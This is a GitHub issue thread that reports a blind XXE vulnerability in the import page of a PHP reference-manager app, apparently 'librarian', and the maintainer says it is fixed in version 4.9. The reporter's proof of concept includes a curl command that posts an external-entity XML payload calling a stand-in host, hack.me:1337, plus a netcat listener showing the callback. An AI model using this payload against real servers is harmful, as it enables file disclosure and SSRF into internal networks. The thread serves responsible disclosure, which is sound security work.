Skip to content
This repository has been archived by the owner on Jan 27, 2023. It is now read-only.

XXE vulnerability #116

Closed
sn00pyd0g3 opened this issue Mar 2, 2018 · 4 comments
Closed

XXE vulnerability #116

sn00pyd0g3 opened this issue Mar 2, 2018 · 4 comments
Assignees
Labels

Comments

@sn00pyd0g3
Copy link

if (!$xml = @simplexml_load_file($_FILES['form_import_file']['tmp_name'])) {

if (!$xml = @simplexml_load_string($_POST['form_import_textarea'])) {

$_FILES['form_import_file']['tmp_name'] passes into simplexml_load_file() ,
$_POST['form_import_textarea'] passes into simplexml_load_string().
This creates a Blind XXE vulnerability.

By XXE, an attacker can read the contents of a file on the target host and attack other hosts on the intranet(SSRF).

POC:

[sn00py.B0x] ➤ curl --request POST 'http://127.0.0.1/librarian/importmetadata.php' --cookie "PHPSESSID=fvp5dermov0tv3fqtdblc7c677" --data "form_sent=1&file_type=endnote&form_import_file=1" --data-urlencode 'form_import_textarea=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY entity SYSTEM "http://hack.me:1337/xxe_test">]><root>&entity;</root>'
Done. Total items recorded: 0                                                                                                                             
[sn00py.B0x] ➤ nc -l 1337
GET /xxe_test HTTP/1.0
Host: hack.me:1337
User-Agent: curl/7.50.3
@mkucej
Copy link
Owner

mkucej commented Mar 2, 2018

Thank you for reporting this!

@mkucej mkucej self-assigned this Mar 2, 2018
@mkucej mkucej added the bug label Mar 2, 2018
@sn00pyd0g3
Copy link
Author

May I apply for a CVE ID for this bug😜?

@mkucej
Copy link
Owner

mkucej commented Mar 6, 2018

Sure, you do you. :-)

mkucej added a commit that referenced this issue Mar 21, 2018
@mkucej
Copy link
Owner

mkucej commented Mar 22, 2018

Fixed in 4.9. I could not coax my setup to grab any remote content from an XML, but the provided fix should prevent the XXE vulnerability.

@mkucej mkucej closed this as completed Mar 22, 2018
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
Projects
None yet
Development

No branches or pull requests

2 participants